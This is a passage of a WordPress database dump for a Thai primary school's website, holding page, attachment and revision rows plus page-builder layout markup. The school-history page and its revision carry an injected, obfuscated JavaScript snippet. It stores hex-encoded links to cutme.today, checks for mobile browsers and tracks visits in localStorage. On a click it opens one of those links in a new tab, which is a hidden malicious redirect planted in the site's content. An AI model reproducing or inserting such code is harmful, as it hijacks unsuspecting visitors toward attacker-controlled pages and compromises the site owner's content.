)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประวัติโรงเรียน','','publish','closed','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99','','','2024-08-07 14:09:02','2024-08-07 07:09:02','',0,'http://pakhaeng.ssk.in.th/?page_id=643',0,'page','',0),
(644,1,'2024-08-07 14:03:30','2024-08-07 07:03:30','','ประวัติโรงเรียนโดยย่อ','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%82%e0%b8%94%e0%b8%a2%e0%b8%a2%e0%b9%88%e0%b8%ad','','','2024-08-07 14:03:30','2024-08-07 07:03:30','',643,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประวัติโรงเรียนโดยย่อ.pdf',0,'attachment','application/pdf',0),
(645,1,'2024-08-07 14:07:58','2024-08-07 07:07:58','','ประวัติโรงเรียนโดยย่อ_page-0001','','inherit','','closed','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a7%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b9%82%e0%b8%94%e0%b8%a2%e0%b8%a2%e0%b9%88%e0%b8%ad_page-0001','','','2024-08-07 14:07:58','2024-08-07 07:07:58','',643,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประวัติโรงเรียนโดยย่อ_page-0001.jpg',0,'attachment','image/jpeg',0),
(646,1,'2024-08-07 14:09:01','2024-08-07 07:09:01','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":645,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ประวัติโรงเรียนโดยย่อ_page-0001.jpg\" alt=\"\" class=\"wp-image-645\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประวัติโรงเรียน','','inherit','closed','closed','','643-revision-v1','','','2024-08-07 14:09:01','2024-08-07 07:09:01','',643,'http://pakhaeng.ssk.in.th/?p=646',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(648,1,'2024-08-07 14:19:30','2024-08-07 07:19:30','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span 